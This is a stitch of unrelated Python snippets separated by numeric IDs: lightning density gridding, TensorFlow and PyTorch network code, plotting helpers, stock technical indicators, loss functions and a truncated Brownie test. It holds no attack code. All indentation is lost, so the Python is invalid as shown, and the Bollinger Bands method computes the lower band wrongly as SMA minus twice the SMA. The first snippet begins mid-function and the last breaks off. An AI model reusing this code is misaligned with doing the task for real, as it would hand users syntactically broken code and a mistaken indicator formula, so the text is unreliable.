# if (test_flash_mask.sum() > 0) & (weight_key == 'area'):
# print("Unique data for flash {0}".format(test_flash_id))
# mesh_xi = test_events['mesh_xi']
# mesh_yi = test_events['mesh_yi']
# mesh_frac = test_events['mesh_frac']
# mesh_t = test_events['time']
# for vals in zip(mesh_t, mesh_frac,
# mesh_xi, x_i[unq_idx][test_flash_mask],
# mesh_yi, y_i[unq_idx][test_flash_mask],
# weights[test_flash_mask]):
# print(vals, weight_lookup[test_flash_id])
target.send((x[unq_idx], y[unq_idx], weights, grid_frac))
del weights, grid_frac, unq_idx
# else:
# print ''
del events, flash, x, y, z, x_i, y_i
@coroutine
def extent_density_3d(x0, y0, z0, dx, dy, dz, target, flash_id_key='flash_id', weight_key=None):
""" This function assumes a regular grid in x and y with spacing dx, dy
x0, y0 is the x coordinate of the lower left corner of the lower-left grid cell,
i.e., the lower left node of the grid mesh in cartesian space
Eliminates duplicate points in gridded space and sends the reduced
set of points to the target.
"""
while True:
# assumes x,y,z are in same order as events
events, flash, x,y,z = (yield)
# print('Doing extent density',)
x_i = np.floor( (x-x0)/dx ).astype('int32')
y_i = np.floor( (y-y0)/dy ).astype('int32')
z_i = np.floor( (z-z0)/dz ).astype('int32')
log.debug(len(x_i))
if len(x_i) > 0:
log.info(('extent with points numbering', len(x_i), ' with weights', weight_key))
unq_idx = unique_vectors(x_i, y_i, z_i, events[flash_id_key])
# if x[unq_idx].shape[0] > 1:
if weight_key != None:
weight_lookup = dict(list(zip(flash[flash_id_key], flash[weight_key])))
weights = [weight_lookup[fi] for fi in events[unq_idx]['flash_id']] #puts weights in same order as x[unq_idx], y[unq_idx]
del weight_lookup
else:
weights = None
target.send((x[unq_idx], y[unq_idx], z[unq_idx], weights))
del weights, unq_idx
# else:
# print ''
del events, flash, x, y, z, x_i, y_i, z_i
@coroutine
def accumulate_points_on_grid(grid, xedge, yedge, out=None, label='',
grid_frac_weights=False):
assert xedge.shape[0] == grid.shape[0]+1
assert yedge.shape[0] == grid.shape[1]+1
if out == None:
out = {}
# grid = None
# When we do a calculation like average flash area, we need to sum the
# areas, and sum the flashes, and divide at the end. Otherwise, if we have
# a frame that spans multiple data files (and therefore chunks of
# x,y,weights) we will calculate the sum of the averages due to each chunk
# instead of getting the true average. Therefore, create a set of grids for
# tracking the accumulation, and update the final grid with the new
# accumulation each time through the loop.
count_hist = grid.copy()
total_hist = grid.copy()
have_weights = False
try:
while True:
if grid_frac_weights:
x, y, weights, grid_frac = (yield)
# There is an issue with small weights being rounded to
# zero in histogramdd, so multiply by some large value
# and divide it back out later.
# https://github.com/numpy/numpy/issues/9465
# seems to not be necessary for the dynamic range we have
# grid_frac = grid_frac.astype('f8')
# grid_frac_scale = 1.0e5
# grid_frac = grid_frac.astype('f8')*grid_frac_scale
else:
x, y, weights = (yield)
grid_frac=None
if len(x) > 0:
x = np.atleast_1d(x)
y = np.atleast_1d(y)
log.info(('accumulating ', len(x), 'points for ', label))
count, edges = np.histogramdd((x,y), bins=(xedge, yedge),
weights=grid_frac, normed=False)
count_hist += count.astype(count_hist.dtype)
# if grid_frac_weights:
# count /= grid_frac_scale
if weights is not None:
have_weights = True
# histogramdd sums up weights in each bin for normed=False
if grid_frac is not None:
weights = weights*grid_frac
total, edges = np.histogramdd((x,y), bins=(xedge, yedge),
weights=weights, normed=False)
total_hist += total
del total, edges
# try:
# count, edges = np.histogramdd((x,y), bins=(xedge, yedge), weights=weights)
# except AttributeError:
# # if x,y are each scalars, need to make 1D arrays
# x = np.asarray((x,))
# y = np.asarray((y,))
# count, edges = np.histogramdd((x,y), bins=(xedge, yedge), weights=weights)
# using += (as opposed to grid = grid + count) is essential
# so that the user can retain a reference to the grid object
# outside this routine.
if grid is None:
grid = count
out['out'] = grid
else:
if have_weights:
bad = (count_hist <= 0)
avg = np.asarray(total_hist, dtype='float32')/count_hist
avg[bad] = 0.0
del bad
else:
avg = count_hist
grid[:] = avg[:].astype(grid.dtype)
# grid += count.astype(grid.dtype)
del count, avg
del x, y, weights, grid_frac
gc.collect()
except GeneratorExit:
out['out'] = grid
@coroutine
def accumulate_points_on_grid_3d(grid, xedge, yedge, zedge, out=None, label=''):
assert xedge.shape[0] == grid.shape[0]+1
assert yedge.shape[0] == grid.shape[1]+1
assert zedge.shape[0] == grid.shape[2]+1
if out == None:
out = {}
# grid = None
try:
while True:
x, y, z, weights = (yield)
if len(x) > 0:
x = np.atleast_1d(x)
y = np.atleast_1d(y)
z = np.atleast_1d(z)
log.info(('accumulating ', len(x), 'points for ', label))
count, edges = np.histogramdd((x,y,z), bins=(xedge, yedge, zedge), weights=None, normed=False)
if weights != None:
# histogramdd sums up weights in each bin for normed=False
total, edges = np.histogramdd((x,y,z), bins=(xedge, yedge, zedge), weights=weights, normed=False)
# return the mean of the weights in each bin
bad = (count <= 0)
count = np.asarray(total, dtype='float32')/count
count[bad] = 0.0
del total, edges, bad
# using += (as opposed to grid = grid + count) is essential
# so that the user can retain a reference to the grid object
# outside this routine.
if grid is None:
grid = count
out['out'] = grid
else:
grid += count.astype(grid.dtype)
del count
del x, y, z, weights
gc.collect()
except GeneratorExit:
out['out'] = grid
##Repetition of functions below can probably be reduced to the original functions, however
##remain as this was the only way to get new gridded fields that were no the mean.
####FOR STANDARD DEVIATION OF A SINGLE FIELD:
@coroutine
def accumulate_points_on_grid_sdev(grid, grid2, xedge, yedge, out=None, label='', grid_frac_weights=True):
assert xedge.shape[0] == grid.shape[0]+1
assert yedge.shape[0] == grid.shape[1]+1
if out == None:
out = {}
# grid = None
try:
while True:
if grid_frac_weights:
x, y, weights, grid_frac = (yield)
else:
x, y, weights = (yield)
grid_frac=None
if len(x) > 0:
x = np.atleast_1d(x)
y = np.atleast_1d(y)
log.info(('accumulating ', len(x), 'points for ', label))
count, edges = np.histogramdd((x,y), bins=(xedge, yedge), weights=grid_frac, normed=False)
if weights is not None:
# histogramdd sums up weights in each bin for normed=False
total, edges = np.histogramdd((x,y), bins=(xedge, yedge), weights=np.asarray(weights)**2., normed=False)
# return the mean of the weights in each bin
bad = (count <= 0)
count = np.asarray(total, dtype='float32')/count
count[bad] = 0.0
del total, edges, bad
# using += (as opposed to grid = grid + count) is essential
# so that the user can retain a reference to the grid object
# outside this routine.
if grid is None:
grid = count
out['out'] = grid
else:
grid += count.astype(grid.dtype)
grid = np.sqrt(grid - (grid2)**2.)
del count
del x, y, weights
gc.collect()
except GeneratorExit:
out['out'] = grid
@coroutine
def accumulate_points_on_grid_sdev_3d(grid, grid2, xedge, yedge, zedge, out=None, label=''):
assert xedge.shape[0] == grid.shape[0]+1
assert yedge.shape[0] == grid.shape[1]+1
assert zedge.shape[0] == grid.shape[2]+1
if out == None:
out = {}
# grid = None
try:
while True:
x, y, z, weights = (yield)
if len(x) > 0:
x = np.atleast_1d(x)
y = np.atleast_1d(y)
z = np.atleast_1d(z)
log.info(('accumulating ', len(x), 'points for ', label))
count, edges = np.histogramdd((x,y,z), bins=(xedge, yedge, zedge), weights=None, normed=False)
if weights != None:
# histogramdd sums up weights in each bin for normed=False
total, edges = np.histogramdd((x,y,z), bins=(xedge, yedge, zedge), weights=np.asarray(weights)**2., normed=False)
# return the mean of the weights in each bin
bad = (count <= 0)
count = np.asarray(total, dtype='float32')/count
count[bad] = 0.0
del total, edges, bad
# using += (as opposed to grid = grid + count) is essential
# so that the user can retain a reference to the grid object
# outside this routine.
if grid is None:
grid = count
out['out'] = grid
else:
grid += count.astype(grid.dtype)
grid = np.sqrt(grid - (grid2)**2.)
del count
del x, y, z, weights
gc.collect()
except GeneratorExit:
out['out'] = grid
#####For Minima of extensive quantities:
@coroutine
def accumulate_minimum_on_grid(grid, xedge, yedge, out=None, label='', grid_frac_weights=True):
"""
Instead of adding values from the counts produced from new blobs of data as
they arrive, take the minimum of the previous value and the new value at
each grid location. Logic prior to this function must eliminate all but one
of the values at each grid cell, since the histogram process accumulates
all of the values at that grid cell location for the blob of data that.
arrives.
"""
assert xedge.shape[0] == grid.shape[0]+1
assert yedge.shape[0] == grid.shape[1]+1
if out == None:
out = {}
# grid = None
try:
while True:
if grid_frac_weights:
x, y, weights, grid_frac = (yield)
else:
x, y, weights = (yield)
grid_frac=None
if len(x) > 0:
x = np.atleast_1d(x)
y = np.atleast_1d(y)
log.info(('accumulating ', len(x), 'points for ', label))
count, edges = np.histogramdd((x,y), bins=(xedge, yedge), weights=grid_frac, normed=False)
if weights is not None:
have_weights = True
# histogramdd sums up weights in each bin for normed=False
if grid_frac is not None:
weights = weights*grid_frac
total, edges = np.histogramdd((x,y), bins=(xedge, yedge),
weights=weights, normed=False)
# return the mean of the weights in each bin
bad = (count <= 0)
count = np.asarray(total, dtype='float32')#/count
count[bad] = 0.0
del total, edges, bad
# using += (as opposed to grid = grid + count) is essential
# so that the user can retain a reference to the grid object
# outside this routine.
if grid is None:
grid = count
out['out'] = grid
else:
hascount, hasgrid = (count > 0), (grid > 0)
compboth = hasgrid & hascount
countonly = np.isclose(grid, 0) & hascount
minboth = np.minimum(grid[compboth],
count[compboth].astype(grid.dtype))
grid[compboth] = minboth
grid[countonly] = count[countonly].astype(grid.dtype)
del count
del x, y, weights
gc.collect()
except GeneratorExit:
out['out'] = grid
#####FOR TOTAL ENERGY:
@coroutine
def accumulate_energy_on_grid(grid, xedge, yedge, out=None, label='', grid_frac_weights=True):
"""
Like accumulate_points_on_grid, but doesn't normalize by the total count
"""
assert xedge.shape[0] == grid.shape[0]+1
assert yedge.shape[0] == grid.shape[1]+1
if out == None:
out = {}
# grid = None
try:
while True:
if grid_frac_weights:
x, y, weights, grid_frac = (yield)
else:
x, y, weights = (yield)
grid_frac=None
if len(x) > 0:
x = np.atleast_1d(x)
y = np.atleast_1d(y)
log.info(('accumulating ', len(x), 'points for ', label))
count, edges = np.histogramdd((x,y), bins=(xedge, yedge), weights=grid_frac, normed=False)
if weights is not None:
have_weights = True
# histogramdd sums up weights in each bin for normed=False
if grid_frac is not None:
weights = weights*grid_frac
total, edges = np.histogramdd((x,y), bins=(xedge, yedge),
weights=weights, normed=False)
# return the mean of the weights in each bin
bad = (count <= 0)
count = np.asarray(total, dtype='float32')#/count
count[bad] = 0.0
del total, edges, bad
# using += (as opposed to grid = grid + count) is essential
# so that the user can retain a reference to the grid object
# outside this routine.
if grid is None:
grid = count
out['out'] = grid
else:
grid += count.astype(grid.dtype)
del count
del x, y, weights
gc.collect()
except GeneratorExit:
out['out'] = grid
@coroutine
def accumulate_energy_on_grid_3d(grid, xedge, yedge, zedge, out=None, label=''):
assert xedge.shape[0] == grid.shape[0]+1
assert yedge.shape[0] == grid.shape[1]+1
assert zedge.shape[0] == grid.shape[2]+1
if out == None:
out = {}
# grid = None
try:
while True:
x, y, z, weights = (yield)
if len(x) > 0:
x = np.atleast_1d(x)
y = np.atleast_1d(y)
z = np.atleast_1d(z)
log.info(('accumulating ', len(x), 'points for ', label))
count, edges = np.histogramdd((x,y,z), bins=(xedge, yedge, zedge), weights=None, normed=False)
if weights != None:
# histogramdd sums up weights in each bin for normed=False
total, edges = np.histogramdd((x,y,z), bins=(xedge, yedge, zedge), weights=np.abs(weights), normed=False)
# return the mean of the weights in each bin
bad = (count <= 0)
count = np.asarray(total, dtype='float32')#/count
count[bad] = 0.0
del total, edges, bad
# try:
# count, edges = np.histogramdd((x,y), bins=(xedge, yedge), weights=weights)
# except AttributeError:
# # if x,y are each scalars, need to make 1D arrays
# x = np.asarray((x,))
# y = np.asarray((y,))
# count, edges = np.histogramdd((x,y), bins=(xedge, yedge), weights=weights)
# using += (as opposed to grid = grid + count) is essential
# so that the user can retain a reference to the grid object
# outside this routine.
if grid is None:
grid = count
out['out'] = grid
else:
grid += count.astype(grid.dtype)
del count
del x, y, z, weights
gc.collect()
except GeneratorExit:
out['out'] = grid
# if __name__ == '__main__':
# do_profile=False
# if do_profile:
# import hotshot
# from hotshot import stats
# prof = hotshot.Profile("density_test_profile")
# prof.runcall(example)
# prof.close()
# s=stats.load("density_test_profile")
# s.sort_stats("time").print_stats()
# else:
# x_coord, y_coord, lons, lats, test_grid = example()
|
1696981
|
import tensorflow as tf
import model as M
bn_training = True
def conv_layers(inp,reuse=False):
global bn_training
with tf.variable_scope('enc',reuse=reuse):
mod = M.Model(inp)
mod.set_bn_training(bn_training)
mod.convLayer(7,16,stride=2,activation=M.PARAM_LRELU,batch_norm=True) #128
mod.convLayer(5,32,stride=2,activation=M.PARAM_LRELU,batch_norm=True) # 64
mod.convLayer(5,64,stride=2,activation=M.PARAM_LRELU,batch_norm=True) # 32
mod.SelfAttention(8,residual=True)
mod.convLayer(5,64,stride=2,activation=M.PARAM_LRELU,batch_norm=True) # 16
mod.res_block(64,activation=M.PARAM_LRELU)
mod.res_block(64,activation=M.PARAM_LRELU)
mod.convLayer(5,128,stride=2,activation=M.PARAM_LRELU,batch_norm=True) # 8
mod.res_block(128,activation=M.PARAM_LRELU)
mod.res_block(128,activation=M.PARAM_LRELU)
mod.SelfAttention(32)
mod.convLayer(5,128,stride=2,activation=M.PARAM_LRELU,batch_norm=True) # 4
mod.res_block(128,activation=M.PARAM_LRELU)
mod.res_block(128,activation=M.PARAM_LRELU)
mod.flatten()
return mod.get_current_layer()
def deconv_layers(inp,reuse=False):
global bn_training
with tf.variable_scope('dec',reuse=reuse):
mod = M.Model(inp)
mod.set_bn_training(bn_training)
mod.reshape([-1,4,4,128])
mod.deconvLayer(5,128, stride=2, activation=M.PARAM_LRELU,batch_norm=True) # 8
mod.res_block(128,activation=M.PARAM_LRELU)
mod.res_block(128,activation=M.PARAM_LRELU)
mod.SelfAttention(32)
mod.deconvLayer(5,64, stride=2,activation=M.PARAM_LRELU,batch_norm=True) # 16
mod.res_block(64,activation=M.PARAM_LRELU)
mod.res_block(64,activation=M.PARAM_LRELU)
mod.deconvLayer(5,64,stride=2,activation=M.PARAM_LRELU,batch_norm=True) #32
mod.res_block(64,activation=M.PARAM_LRELU)
feat = mod.deconvLayer(5,32, stride=2,activation=M.PARAM_LRELU,batch_norm=True) # 64
mod.res_block(32,activation=M.PARAM_LRELU)
mod.deconvLayer(5, 32, stride=2, activation=M.PARAM_LRELU,batch_norm=True) #128
A = mod.convLayer(5,3,activation=M.PARAM_SIGMOID)
mod.set_current(feat)
mod.res_block(32,activation=M.PARAM_LRELU)
mod.deconvLayer(5,32,stride=2,activation=M.PARAM_LRELU,batch_norm=True) # 128
mod.res_block(32,activation=M.PARAM_LRELU)
mod.deconvLayer(5,16,stride=2,activation=M.PARAM_LRELU,batch_norm=True) #256
C = mod.convLayer(5,3,activation=M.PARAM_TANH)
A = tf.image.resize_images(A,(256,256))
# C = tf.image.resize_images(C,(256,256))
return A,C
|
1697069
|
import tensorflow as tf
class NodeSequenceTest(tf.test.TestCase):
def test_node_sequence(self):
neighborhood = tf.constant([
[1, 0, 3, -1],
[2, 1, 0, -1],
])
nodes = tf.constant([
[0.5, 0.5, 0.5],
[1.5, 1.5, 1.5],
[2.5, 2.5, 2.5],
[3.5, 3.5, 3.5],
])
expected = [
[[1.5, 1.5, 1.5], [0.5, 0.5, 0.5], [3.5, 3.5, 3.5], [0, 0, 0]],
[[2.5, 2.5, 2.5], [1.5, 1.5, 1.5], [0.5, 0.5, 0.5], [0, 0, 0]],
]
def _map_features(node):
i = tf.maximum(node, 0)
positive = tf.strided_slice(nodes, [i], [i+1], [1])
negative = tf.zeros([1, 3])
return tf.where(node < 0, negative, positive)
with self.test_session() as sess:
data = tf.reshape(neighborhood, [-1])
data = tf.map_fn(_map_features, data, dtype=tf.float32)
data = tf.reshape(data, [2, 4, 3])
self.assertAllEqual(data.eval(), expected)
|
1697101
|
import matplotlib.pyplot as plt
import seaborn as sns
import numpy as np
from matplotlib import gridspec
sns.set_style("whitegrid")
def plot_residuals(predicted_series,
actual_series,
time_vector,
num_training_points,
num_validation_points,
base_path=None,
file_name=None): # pragma: no cover
"""Plotting function for plotting the predicted series with the residuals.
Parameters
----------
predicted_series : np.array
Predicted vector
actual_series : np.array
Actual response vector
time_vector : np.array
Time vector
num_training_points : integer
Number of points used for training
num_validation_points : integer
Number of points used for validation
base_path: string (default None)
Base path for saving the plot
base_path: string (default None)
Base path for saving the plot
file_name: string (default None)
File name for the plot
"""
fig = plt.figure(figsize=(15, 15))
residuals = actual_series - predicted_series
gs = gridspec.GridSpec(2, 1, height_ratios=[3, 1])
axarr = [0, 0]
axarr[0] = plt.subplot(gs[0])
axarr[0].plot(time_vector, predicted_series,
marker='o', label='Predicted', markersize=5,
alpha=0.9, linestyle='-', linewidth=.5)
axarr[0].plot(time_vector, actual_series, marker='o', label='Actual',
markersize=5, linestyle='--')
xlim = plt.xlim()
axarr[0].set_ylim((min(predicted_series)-1, max(predicted_series)+1))
axarr[0].axvspan(xlim[0], time_vector[num_training_points], alpha=0.1,
label='Training set', color='r')
axarr[0].axvspan(time_vector[num_training_points],
time_vector[num_training_points + num_validation_points],
alpha=0.1,
label='Validation set', color='b')
axarr[0].legend()
axarr[0].set_title('Predicted vs Actual plot', fontsize=24)
axarr[0].set_xlabel('Time', fontsize=20)
axarr[0].set_ylabel('Magnitude', fontsize=20)
axarr[1] = plt.subplot(gs[1])
axarr[1].scatter(time_vector.tolist(), residuals.tolist())
xlim = plt.xlim()
ax2_ylim = axarr[1].get_ylim()
axarr[1].axvspan(xlim[0], time_vector[num_training_points], alpha=0.1,
label='Training set', color='r')
axarr[1].axvspan(time_vector[num_training_points],
time_vector[num_training_points + num_validation_points],
alpha=0.1,
label='Validation set', color='b')
axarr[1].legend()
axarr[1].set_title('Residual plot', fontsize=24)
axarr[1].set_xlabel('Time', fontsize=20)
axarr[1].set_ylabel('Residuals', fontsize=20)
axarr[1].set_xlim([min(time_vector), max(time_vector)])
axarr[1].set_ylim(ax2_ylim[0]-1, ax2_ylim[1]+1)
if (base_path is not None and file_name is not None):
plt.savefig(base_path+file_name)
plt.close()
|
1697124
|
import pandas as pd
import numpy as np
from typing import List, Optional
import matplotlib.pyplot as plt
import warnings
warnings.filterwarnings("ignore")
class Indices:
"""
Price Technical Indicators
"""
def __init__(
self, df: pd.DataFrame, date_col: str = "date", price_col: str = "price"
) -> None:
self.df = df
self.date_col = date_col
self.price_col = price_col
def get_vola_index(
self, volatile_period: Optional[int] = 30
) -> pd.DataFrame:
"""
Volatility Index is a measure of market's expectation of volatility over
the near term.
Volatility is often described as the "rate and magnitude of changes in
prices" and in finance often referred to as risk.
Reference:
www.moneycontrol.com
Returns:
pd.DataFrame: Pandas DataFrame
"""
data = self.df.copy()
data = data.sort_values(by=self.date_col).reset_index(drop=True)
v = np.log(data[self.price_col]).diff().rolling(volatile_period).std() * np.sqrt(365)
df_bvol = pd.DataFrame(data={'BVOL_Index': v})
data = pd.concat([data, df_bvol], join="inner", axis=1)
data = data.dropna()
data = data.sort_values(by=self.date_col, ascending=False).reset_index(
drop=True
)
return data
@staticmethod
def get_vola_graph(
data: pd.DataFrame, output_path: Optional[str] = "bvol_index.png"
) -> None:
"""
Make a line graph of volatile index with respect to time
Args:
data(pd.DataFrame): Output of get_vola_index function
output_path(str): Path to save plot
"""
fig, ax = plt.subplots(figsize=(14, 12))
rect = fig.patch
rect.set_facecolor("yellow")
ax1 = plt.subplot(211)
ax1.plot(data["date"], data["price"], color="blue", label="Price")
plt.ylabel("Price", color="red", fontsize=20)
ax1.axes.get_xaxis().set_ticks([])
plt.legend()
ax1.tick_params(axis="y", colors="b")
ax1.grid(color="grey", linestyle="-", linewidth=0.25, alpha=0.5)
ax2 = plt.subplot(212)
ax2.plot(
data["date"], data["BVOL_Index"], color="b", label="BVOL Index"
)
plt.xlabel("Time", color="red", fontsize=20)
plt.ylabel("Volatility Index", color="r", fontsize=20)
plt.legend()
plt.setp(ax2.xaxis.get_majorticklabels(), rotation=90)
ax2.grid(color="grey", linestyle="-", linewidth=0.25, alpha=0.5)
ax2.tick_params(axis="x", colors="b")
ax2.tick_params(axis="y", colors="b")
plt.suptitle("Price and Volatility Index", color="red", fontsize=24)
plt.savefig(output_path, bbox_inches="tight", facecolor="orange")
plt.show()
def get_rsi(self) -> pd.DataFrame:
"""
Type:
Momentum indicator
Computation:
It is based on the average price increase during a period of
rising prices and average price fall during a period of
falling stock prices. Relative Strength Index (RSI) is
plotted between 0 and 100.
What it signals:
Usually, the market is treated as overbought when RSI
goes above 70 (80 for highly volatile stocks) and
oversold when it hits 30—20 for highly volatile stocks.
Reference:
https://economictimes.indiatimes.com/
Returns:
pd.DataFrame: Pandas DataFrame with RSI values
"""
data = self.df.copy()
data = data.sort_values(by=self.date_col).reset_index(drop=True)
data["price_change"] = data[self.price_col] - data[
self.price_col
].shift(1)
data.dropna(inplace=True)
data["gain"] = np.where(data["price_change"] >= 0, data["price_change"], 0)
data["loss"] = np.where(data["price_change"] <= 0, abs(data["price_change"]), 0)
data["gain_average"] = data["gain"].rolling(14).mean()
data["loss_average"] = data["loss"].rolling(14).mean()
data["RS"] = data["gain_average"] / data["loss_average"]
data["RSI_1"] = 100 * (1 - (1 / (1 + data["RS"])))
data["RS_Smooth"] = (
data["gain_average"].shift(1) * 13 + data["gain"]
) / (data["loss_average"].shift(1) * 13 + data["loss"])
data["RSI_2"] = 100 * (1 - (1 / (1 + data["RS_Smooth"])))
data = data.fillna(0).reset_index(drop=True)
data.drop(
[
"gain",
"loss",
"price_change",
"gain_average",
"loss_average",
"RS",
],
axis=1,
inplace=True,
)
data = data.sort_values(by=self.date_col, ascending=False).reset_index(
drop=True
)
return data
@staticmethod
def get_rsi_graph(data: pd.DataFrame) -> None:
"""
Plot RSI against date and price
Args:
data(pd.DataFrame): Output of get_rsi function.
"""
fig, ax = plt.subplots(figsize=(14, 12))
rect = fig.patch
rect.set_facecolor("yellow")
ax1 = plt.subplot(211)
ax1.plot(data["date"], data["price"], color="blue", label="Price")
plt.ylabel("Price ($)", color="red", fontsize=20)
ax1.axes.get_xaxis().set_ticks([])
plt.legend()
ax1.tick_params(axis="y", colors="b")
ax2 = plt.subplot(212)
ax2.plot(data["date"], data["RSI_2"], color="b", label="RSI")
plt.xlabel("Time", color="red", fontsize=20)
plt.ylabel("Relative Strength Index (RSI)", color="r", fontsize=20)
plt.text(
data["date"][int(len(data) / 2)],
80,
">70 OverBought",
fontsize=20,
color="black",
)
plt.text(
data["date"][int(len(data) / 2)],
15,
"<30 OverSold",
fontsize=20,
color="black",
)
plt.legend()
plt.setp(ax2.xaxis.get_majorticklabels(), rotation=90)
ax2.tick_params(axis="x", colors="b")
ax2.tick_params(axis="y", colors="b")
ax2.axhline(y=70, color="r")
ax2.axhline(y=30, color="r")
plt.suptitle(
"Price and Relative Strength Index", color="red", fontsize=24
)
plt.savefig("rsi.png", bbox_inches="tight", facecolor="orange")
plt.show()
def get_bollinger_bands(
self,
days: Optional[int] = 20,
plot: Optional[bool] = False,
out_path: Optional[str] = "bollinger_bands.png",
) -> pd.DataFrame:
"""
Type:
Trend, volatility, momentum indicator
Computation:
They comprise three lines: A 20-day moving average, an upper
band and lower band—the upper and lower bands are plotted as
two standard deviations from the moving average.
What it signals:
The moving average shows the trend, the gap between
upper and lower band shows volatility in the counter.
References:
1. https://economictimes.indiatimes.com/
2. https://www.bollingerbands.com/bollinger-bands
Args:
days (int): Number of days to calculate moving average
plot (bool): If plot bollinger bands
out_path (str): Save path for plot
Returns:
pd.DataFrame: A pandas DataFrame and save a plot to given path.
"""
data = self.df.copy()
data = data.sort_values(by=self.date_col).reset_index(drop=True)
data["SMA"] = data[self.price_col].rolling(days).mean()
data["SD"] = data[self.price_col].rolling(days).std()
data["BB_upper"] = data["SMA"] + data["SD"] * 2
data["BB_lower"] = data["SMA"] - data["SMA"] * 2
data.drop(["SD", "SMA"], axis=1, inplace=True)
data = data.sort_values(by=self.date_col, ascending=False).reset_index(
drop=True
)
while plot:
fig, ax = plt.subplots(figsize=(16, 12))
plt.plot(data[self.date_col], data["BB_upper"], color="g")
plt.plot(data[self.date_col], data["BB_lower"], color="g")
plt.plot(data[self.date_col], data[self.price_col], color="orange")
plt.legend()
plt.xlabel("Time", color="b", fontsize=22)
plt.ylabel("Price", color="b", fontsize=22)
plt.title("Bollinger Bands", color="b", fontsize=27)
plt.tick_params(labelsize=17)
fig.set_facecolor("yellow")
plt.grid()
plt.savefig(
out_path, bbox_inches="tight", facecolor="orange",
)
plt.show()
break
return data
def get_moving_average_convergence_divergence(
self, plot: Optional[bool] = False, out_path: Optional[str] = "macd.png"
) -> pd.DataFrame:
"""
Type
Trend and momentum indicator
Computation
The difference between 12 and 26-day moving averages.
What it signals
Rising Moving Average Convergence Divergence (MACD) indicates an
upward price trend and falling MACD indicates a downward price trend.
Reference:
https://economictimes.indiatimes.com/
Args:
plot (bool): If plot bollinger bands
out_path (str): Save path for plot
Returns:
pd.DataFrame: Pandas DataFrame with MACD values
"""
data = self.df.copy()
data["EMA_12"] = data[self.price_col].ewm(span=12, adjust=False).mean()
data["EMA_26"] = data[self.price_col].ewm(span=26, adjust=False).mean()
data["MACD"] = data["EMA_12"] - data["EMA_26"]
data.drop(["EMA_12", "EMA_26"], axis=1, inplace=True)
data = data.dropna()
while plot:
fig, ax = plt.subplots(figsize=(14, 9))
plt.plot(
data[self.date_col],
data[self.price_col],
color="r",
label="Price",
)
plt.plot(data[self.date_col], data["MACD"], color="b", label="MACD")
plt.legend()
plt.title("Price and MACD Plot", fontsize=28, color="b")
plt.xlabel("Time", color="b", fontsize=19)
plt.ylabel("Price", color="b", fontsize=19)
plt.savefig(out_path, bbox_inches="tight", facecolor="orange")
fig.set_facecolor("orange")
plt.show()
break
return data
def get_simple_moving_average(
self,
days: Optional[int] = 15,
plot: Optional[bool] = False,
out_path: Optional[str] = "sma.png",
):
"""
Simple moving average of given days
Args:
days (int): Number of days to calculate SMA
plot (bool): If plot bollinger bands
out_path (str): Save path for plot
Returns:
pd.DataFrame: Pandas DataFrame with SMA values
"""
data = self.df.copy()
data = data.sort_values(by=self.date_col).reset_index(drop=True)
data["SMA"] = data[self.price_col].rolling(days).mean()
data = data.dropna()
data = data.sort_values(by=self.date_col, ascending=False).reset_index(
drop=True
)
while plot:
fig, ax = plt.subplots(figsize=(14, 9))
plt.plot(
data[self.date_col],
data[self.price_col],
color="r",
label="Price",
)
plt.plot(data[self.date_col], data["SMA"], color="b", label="SMA")
plt.legend()
plt.title("Price and SMA Plot", fontsize=28, color="b")
plt.xlabel("Time", color="b", fontsize=19)
plt.ylabel("Price", color="b", fontsize=19)
plt.savefig(out_path, bbox_inches="tight", facecolor="orange")
fig.set_facecolor("orange")
plt.show()
break
return data
def get_exponential_moving_average(
self,
periods: List[int] = [20],
plot: Optional[bool] = False,
out_path: Optional[str] = "ema.png",
):
"""
The EMA is a moving average that places a greater weight and
significance on the most recent data points. Like all moving averages,
this technical indicator is used to produce buy and sell signals based
on crossovers and divergences from the historical average.
Traders often use several different EMA days, for instance, 20-day,
30-day, 90-day, and 200-day moving averages.
Reference:
https://www.investopedia.com/
Args:
periods (list): List of period to calculate EMA
days (int): Number of days to calculate SMA
plot (bool): If plot bollinger bands
out_path (str): Save path for plot
Returns:
pd.DataFrame: Pandas DataFrame with EMA values
"""
data = self.df.copy()
for period in periods:
data["EMA_{}".format(period)] = (
data[self.price_col].ewm(span=period, adjust=False).mean()
)
while plot:
fig, ax = plt.subplots(figsize=(14, 9))
plt.plot(
data[self.date_col],
data[self.price_col],
color="r",
label="Price",
)
for period in periods:
plt.plot(
data[self.date_col],
data["EMA_{}".format(period)],
label="EMA_{}".format(period),
)
plt.legend()
plt.title("Price and EMA Plot", fontsize=28, color="b")
plt.xlabel("Time", color="b", fontsize=19)
plt.ylabel("Price/EMA", color="b", fontsize=19)
plt.savefig(out_path, bbox_inches="tight", facecolor="orange")
fig.set_facecolor("orange")
plt.show()
break
return data
|
1697170
|
import torch
import torch.nn.functional as F
def to_tensor(x):
if type(x).__name__ == 'ndarray':
return torch.Tensor(x)
else:
return x
def clipwise_binary_crossentropy(output_dict, target_dict):
'''Weakly labelled loss. The output and target have shape of:
(batch_size, classes_num)
'''
return F.binary_cross_entropy(
output_dict['clipwise_output'], target_dict['weak_target'])
def framewise_binary_crossentropy(output_dict, target_dict):
'''Strongly labelled loss. The output and target have shape of:
(batch_size, frames_num, classes_num)
'''
output = output_dict['framewise_output']
target = target_dict['strong_target']
# To let output and target to have the same time steps
N = min(output.shape[1], target.shape[1])
return F.binary_cross_entropy(
output[:, 0 : N, :],
target[:, 0 : N, :])
|
1697175
|
from collections import defaultdict
from ..config_new import ID_RESOLVING_APIS
from ..utils.common import getPrefixFromCurie, getValFromCurie
class CurieGroup:
def __init__(self, semanticType, curies):
self.semanticType = semanticType
self.curies = curies
@staticmethod
def _findAPI(semanticType):
return ID_RESOLVING_APIS.get(semanticType, {})
def groupCuriesByPrefix(self, curies: list):
grped = defaultdict(set)
for curie in curies:
prefix = getPrefixFromCurie(curie)
val = getValFromCurie(curie)
grped[prefix].add(val)
return grped
|
1697177
|
from torch.nn import Sequential, Conv2d, BatchNorm2d, ReLU
from ..utils import RichRepr
class Bottleneck(RichRepr, Sequential):
r"""
A 1x1 convolutional layer, followed by Batch Normalization and ReLU
"""
def __init__(self, in_channels: int, out_channels: int):
super(Bottleneck, self).__init__()
self.in_channels = in_channels
self.out_channels = out_channels
self.add_module('conv', Conv2d(in_channels, out_channels, kernel_size=1, bias=False))
self.add_module('norm', BatchNorm2d(num_features=out_channels))
self.add_module('relu', ReLU(inplace=True))
def __repr__(self):
return super(Bottleneck, self).__repr__(self.in_channels, self.out_channels)
|
1697211
|
import pytest
from brownie import network, AdvancedCollectible
def test_can_create_advanced_collectible(
get_account,
get_vrf_coordinator,
get_keyhash,
get_link_token,
chainlink_fee,
get_seed,
